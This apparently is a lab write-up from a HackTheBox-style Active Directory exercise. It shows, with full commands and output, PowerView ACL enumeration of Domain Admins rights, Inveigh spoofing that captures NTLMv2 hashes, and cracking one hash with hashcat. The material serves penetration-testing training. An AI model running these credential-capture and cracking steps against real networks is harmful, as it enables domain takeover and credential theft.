Enum

Lets use Sharphound and Bloodhound. We need to transfer the Sharphound tool to the victim machine.

First we transfer it from our machine to the attack machine using ssh:

scp -r SharpHound.exe  [email protected]:/home/htb-student/Desktop/ad/

Then leveraging evil-winrm session we upload SharpHound from attackbox to MS01:

upload ./SharpHound.exe C:\Users\Administrator\Desktop

I tried running it but ended up with errors:

*Evil-WinRM* PS C:\Users\Administrator\Desktop> ./SharpHound.exe -c All
2024-10-23T20:29:33.4184482-05:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-10-23T20:29:33.5746977-05:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-10-23T20:29:33.6059524-05:00|INFORMATION|Initializing SharpHound at 8:29 PM on 10/23/2024
2024-10-23T20:29:33.6528747-05:00|WARNING|[CommonLib LDAPUtils]Exception getting LDAP connection for filter (objectclass=domain) and domain INLANEFREIGHT.LOCAL
System.DirectoryServices.ActiveDirectory.ActiveDirectoryOperationException: An operations error occurred.
 ---> System.DirectoryServices.DirectoryServicesCOMException: An operations error occurred.

   at System.DirectoryServices.DirectoryEntry.Bind(Boolean throwIfFail)
   at System.DirectoryServices.DirectoryEntry.Bind()
   at System.DirectoryServices.DirectoryEntry.get_AdsObject()
   at System.DirectoryServices.PropertyValueCollection.PopulateList()
   at System.DirectoryServices.PropertyValueCollection..ctor(DirectoryEntry entry, String propertyName)
   at System.DirectoryServices.PropertyCollection.get_Item(String propertyName)
   at System.DirectoryServices.ActiveDirectory.PropertyManager.GetPropertyValue(DirectoryContext context, DirectoryEntry directoryEntry, String propertyName)
   --- End of inner exception stack trace ---
   at System.DirectoryServices.ActiveDirectory.PropertyManager.GetPropertyValue(DirectoryContext context, DirectoryEntry directoryEntry, String propertyName)
   at System.DirectoryServices.ActiveDirectory.Domain.GetRoleOwner(ActiveDirectoryRole role)
   at System.DirectoryServices.ActiveDirectory.Domain.get_PdcRoleOwner()
   at SharpHoundCommonLib.LDAPUtils.<GetUsableDomainController>d__47.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
   at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
   at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
   at SharpHoundCommonLib.LDAPUtils.<CreateLDAPConnection>d__46.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
   at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
   at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
   at SharpHoundCommonLib.LDAPUtils.<QueryLDAP>d__34.MoveNext()
2024-10-23T20:29:33.6528747-05:00|ERROR|Unable to connect to LDAP, verify your credentials

Even SharpHound.ps1 didn't work. So instead I downloaded PowerView.ps1 into the MS01.

Get-DomainObjectAcl -ResolveGUIDs -Identity "CN=Domain Admins,CN=Users,DC=inlanefreight,DC=local" | Where-Object { $_.ActiveDirectoryRights -like "*GenericAll*" }

Even this was giving me errors:

*Evil-WinRM* PS C:\Users\Administrator\Desktop> Get-DomainObjectAcl -ResolveGUIDs -Identity "CN=Domain Admins,CN=Users,DC=inlanefreight,DC=local" | Where-Object { $_.ActiveDirectoryRights -like "*GenericAll*" }
[Get-DomainGUIDMap] Error in retrieving forest schema path from Get-Forest
    + CategoryInfo          : OperationStopped: ([Get-DomainGUID...from Get-Forest:String) [], RuntimeException
    + FullyQualifiedErrorId : [Get-DomainGUIDMap] Error in retrieving forest schema path from Get-Forest

So I had to change evil-winrm and use meterpreter to get a shell this time. Checkout Second Approach in Privilege Escalation.

Now I'll run the PowerView command again:

PS C:\> Get-DomainObjectAcl -ResolveGUIDs -Identity "CN=Domain Admins,CN=Users,DC=inlanefreight,DC=local" | Where-Object { $_.ActiveDirectoryRights -like "*GenericAll*" }
Get-DomainObjectAcl -ResolveGUIDs -Identity "CN=Domain Admins,CN=Users,DC=inlanefreight,DC=local" | Where-Object { $_.ActiveDirectoryRights -like "*GenericAll*" }


AceType               : AccessAllowed
ObjectDN              : CN=Domain Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
ActiveDirectoryRights : GenericAll
OpaqueLength          : 0
ObjectSID             : S-1-5-21-3327542485-274640656-2609762496-512
InheritanceFlags      : ContainerInherit
BinaryLength          : 36
IsInherited           : False
IsCallback            : False
PropagationFlags      : None
SecurityIdentifier    : S-1-5-21-3327542485-274640656-2609762496-4611
AccessMask            : 983551
AuditFlags            : None
AceFlags              : ContainerInherit
AceQualifier          : AccessAllowed

AceType               : AccessAllowed
ObjectDN              : CN=Domain Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
ActiveDirectoryRights : GenericAll
OpaqueLength          : 0
ObjectSID             : S-1-5-21-3327542485-274640656-2609762496-512
InheritanceFlags      : None
BinaryLength          : 20
IsInherited           : False
IsCallback            : False
PropagationFlags      : None
SecurityIdentifier    : S-1-5-18
AccessMask            : 983551
AuditFlags            : None
AceFlags              : None
AceQualifier          : AccessAllowed

We are looking at objects that have GenericAll rights to Domain Admins group. Lets turn the SIDs into usernames:

ConvertFrom-SID "S-1–5–21–3327542485–274640656–2609762496–4611"
INLANEFREIGHT\CT059

Now lets try to get the password hash for this user. I tried hashdump on meterpreter but it didnt work. So Let's try running Responder or on Windows, inveigh.ps1 to capture some hashes.

For some reason it wouldn't run the capture. I even tried .ps1 but that gave me lots of errors when trying to import into PS. I tried multiple Inveigh.exe files and the one that worked was https://github.com/Kevin-Robertson/Inveigh/releases/download/v2.0.10/Inveigh-net7.0-win-x64-trimmed-single-v2.0.10.zip

So I ran Inveigh and the capture started and we got an NTLM hash:

*Evil-WinRM* PS C:\tools> .\Inveigh.exe
[*] Inveigh 2.0.10 [Started 2024-10-23T21:20:33 | PID 4956]
[+] Packet Sniffer Addresses [IP 172.16.7.50 | IPv6 fe80::fc7b:e92e:6149:6876%5]
[+] Listener Addresses [IP 0.0.0.0 | IPv6 ::]
[+] Spoofer Reply Addresses [IP 172.16.7.50 | IPv6 fe80::fc7b:e92e:6149:6876%5]
[+] Spoofer Options [Repeat Enabled | Local Attacks Disabled]
[ ] DHCPv6
[+] DNS Packet Sniffer [Type A]
[ ] ICMPv6
[+] LLMNR Packet Sniffer [Type A]
[ ] MDNS
[ ] NBNS
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]
[ ] HTTPS
[+] WebDAV [WebDAVAuth NTLM]
[ ] Proxy
[+] LDAP Listener [Port 389]
[+] SMB Packet Sniffer [Port 445]
[+] File Output [C:\tools]
[+] Previous Session Files (Not Found)
[*] Press ESC to enter/exit interactive console
[.] [21:20:47] TCP(445) SYN packet from 172.16.7.240:59706
[.] [21:20:47] SMB1(445) negotiation request detected from 172.16.7.240:59706
[.] [21:20:47] SMB2+(445) negotiation request detected from 172.16.7.240:59706
[+] [21:20:47] SMB(445) NTLM challenge [5D22774BC6FC3587] sent to 172.16.7.50:59706
[+] [21:20:47] SMB(445) NTLMv2 captured for [\Administrator] from 172.16.7.240():59706:
Administrator:::5D22774BC6FC3587:FD64CD14077152C9EC3DFF161E895A6D:0101000000000000E52E4756BB25DB014C45596958484E360000000002001A0049004E004C0041004E0045004600520045004900470048005400010008004D005300300031000400260049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C00030030004D005300300031002E0049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C000500260049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C0007000800E52E4756BB25DB010900120063006900660073002F004D005300300031000000000000000000
[!] [21:20:47] SMB(445) NTLMv2 for [\Administrator] written to Inveigh-NTLMv2.txt
[-] [21:20:47] Packet sniffing error detected - System.IO.EndOfStreamException: Unable to read beyond the end of the stream.
   at System.IO.BinaryReader.InternalRead(Int32)
   at System.IO.BinaryReader.ReadUInt16()
   at Quiddity.NTLM.NTLMHelper.ReadBytes(Byte[], Int32)
   at Quiddity.NTLM.NTLMHelper..ctor(Byte[])
   at Inveigh.Sniffer.ProcessSMB(Byte[], String, String, String, String)
   at Inveigh.Sniffer.Start(String, String, Boolean)
[.] [21:21:01] TCP(445) SYN packet from 172.16.7.3:51518
[.] [21:21:01] SMB1(445) negotiation request detected from 172.16.7.3:51518
[.] [21:21:01] SMB2+(445) negotiation request detected from 172.16.7.3:51518
[+] [21:21:01] SMB(445) NTLM challenge [11E46F6CFECC14AD] sent to 172.16.7.50:51518
[+] [21:21:01] SMB(445) NTLMv2 captured for [INLANEFREIGHT\CT059] from 172.16.7.3(DC01):51518:
CT059::INLANEFREIGHT:11E46F6CFECC14AD:11B34E3A8B5365BE02A501AB260FDD0D:01010000000000006AC5DF5EBB25DB01A3314868F67444BE0000000002001A0049004E004C0041004E0045004600520045004900470048005400010008004D005300300031000400260049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C00030030004D005300300031002E0049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C000500260049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C00070008006AC5DF5EBB25DB010600040002000000080030003000000000000000000000000020000089023CC2BF7F9FD61B41752D1068070F8E359981D76C85C9777156C6D7D745BE0A001000000000000000000000000000000000000900200063006900660073002F003100370032002E00310036002E0037002E0035003000000000000000000000000000

Voila we crack it using hashcat:

hashcat -m 5600 hash.txt  /usr/share/wordlists/rockyou.txt

I also tried cracking the Administrator hash but failed.

PreviousLateral Movement NextCredentials Obtained

Last updated 1 year ago